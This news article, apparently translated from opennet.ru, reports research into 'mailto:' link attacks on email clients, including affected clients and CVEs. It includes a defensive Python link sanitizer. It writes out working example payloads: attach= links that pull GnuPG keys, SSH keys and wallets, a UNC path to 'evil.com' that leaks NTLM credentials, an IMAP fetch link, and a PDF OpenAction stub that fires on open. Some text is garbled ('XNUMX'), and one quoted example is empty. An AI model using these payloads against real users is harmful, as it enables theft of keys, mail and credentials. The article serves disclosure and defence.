Attacking email clients via "mailto:" links

Researchers from Ruhr University Bochum (Germany) analysed (PDF) how mail clients behave when processing "mailto:" links that carry extended parameters. Five of the twenty email clients examined were vulnerable to an attack that substitutes resources via the "attach" parameter. A further XNUMX email clients were vulnerable to PGP and S/MIME key substitution, and three clients were vulnerable to an attack that extracts the contents of encrypted messages.

The "mailto:" link is used to automatically open the user's mail client to compose a message to the recipient named in the link. Besides the address, additional parameters can be given as part of the link, such as the subject and a template for the message body. The proposed attack manipulates the "attach" parameter, which allows an attachment to be added to the generated message.

The mail clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail are vulnerable to a trivial attack that attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so unless the user is paying close attention they may not notice that the message is about to be sent with an attachment.

For example, a link such as "mailto:[email protected]?subject=Title&body=Text&attach=~/.gnupg/secring.gpg" inserts the GnuPG private key into the message. In the same way, the contents of crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file readable by the user can be sent out. Moreover, Thunderbird allows whole groups of files to be attached using wildcard masks such as "attach=/tmp/*.txt".

Besides local files, some mail clients also process links to network storage and to paths on an IMAP server. In particular, IBM Notes allows files from a network directory to be transferred when processing links such as "attach=\\evil.com\dummyfile", and NTLM authentication parameters can additionally be intercepted by pointing the link at an SMB server controlled by the attacker (the request is sent with the user's current authentication parameters).

Thunderbird successfully processes requests such as "attach=imap:///fetch>UID>/INBOX>1/", which allows the contents of folders on an IMAP server to be sent. At the same time, messages fetched from IMAP that are encrypted with OpenPGP or S/MIME are automatically decrypted by the mail client before sending. Thunderbird's developers were notified of the problem in February, and the Thunderbird 78 release already fixes it (the Thunderbird 52, 60 and 68 branches remain affected).

Older releases of Thunderbird are also affected by two further attack variants against PGP and S/MIME proposed by the researchers. In particular, Thunderbird, together with Outlook, PostBox, eM Client, MailMate and R2Mail2, turned out to be vulnerable to key substitution, which stems from the fact that the mail client automatically imports and installs new certificates sent in S/MIME messages, allowing an attacker to arrange the replacement of public keys the user has already stored.

The second attack, to which Thunderbird, PostBox and MailMate are subject, manipulates features of the draft-saving mechanism and allows specially crafted links to trigger decryption of encrypted messages or the addition of a digital signature to arbitrary messages, with the result then transferred to the attacker's IMAP server. In this attack the ciphertext is passed via the "body" parameter, and a "meta refresh" tag is used to initiate the connection to the attacker's IMAP server. For example: ' '
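The following Python sketch of a defensive "mailto:" link filter is an added example, not code from the paper or from any of the clients named above. It parses a link, accepts only the standard header fields, rejects the "attach" parameter with a classification of what it points at (local path, wildcard mask, UNC share, IMAP URL), and rejects PGP ciphertext passed via "body"; the allow-list and the sample links in the comments are the example's own assumptions.

```python
from urllib.parse import unquote

# Header fields a client may honour in a mailto: link (RFC 6068). Anything
# else is rejected. This allow-list is the example's own policy, not the
# behaviour of any client named in the article.
ALLOWED_HEADERS = {"to", "cc", "bcc", "subject", "body"}
# Parameter names the affected clients interpreted as "attach this file".
ATTACH_NAMES = {"attach", "attachment"}

def classify_attach(value):
    """Name the kind of resource an attach= value points at."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):
        return "unc-share"   # \\host\share: may also leak NTLM credentials
    if v.lower().startswith("imap:"):
        return "imap-url"    # imap:///fetch>UID>/INBOX>1/: server-side mail
    if any(ch in v for ch in "*?["):
        return "glob"        # /tmp/*.txt: whole groups of files at once
    return "local-path"      # ~/.gnupg/secring.gpg, ~/.ssh/id_rsa, ...

def sanitize_mailto(link):
    """Return (accepted headers, rejected (name, value, reason) tuples)."""
    if not link.lower().startswith("mailto:"):
        raise ValueError("not a mailto: link")
    addr, _, query = link[len("mailto:"):].partition("?")
    accepted, rejected = {}, []
    if addr:
        accepted["to"] = unquote(addr)
    # Split by hand: in mailto URIs "+" is literal, so parse_qs would be wrong.
    for pair in (query.split("&") if query else []):
        name, _, raw = pair.partition("=")
        key, value = name.lower(), unquote(raw)
        if key in ATTACH_NAMES:
            rejected.append((name, value, "attach:" + classify_attach(value)))
        elif key not in ALLOWED_HEADERS:
            rejected.append((name, value, "unknown-header"))
        elif key == "body" and "BEGIN PGP MESSAGE" in value:
            # Ciphertext handed over via body= is the decryption-oracle case;
            # refuse it rather than let the client decrypt and forward it.
            rejected.append((name, value, "ciphertext-in-body"))
        else:
            accepted[key] = value
    return accepted, rejected
```

A client or a link-handling proxy would act only on the accepted dictionary and log the rejected tuples, which is also a useful detection signal for links of this shape in documents and web pages.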

To process a "mailto:" link without any user interaction, specially crafted PDF documents can be used: the OpenAction directive in PDF allows the mail client to be launched as soon as the document is opened:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[…]) >>
endobj


Source: opennet.ru
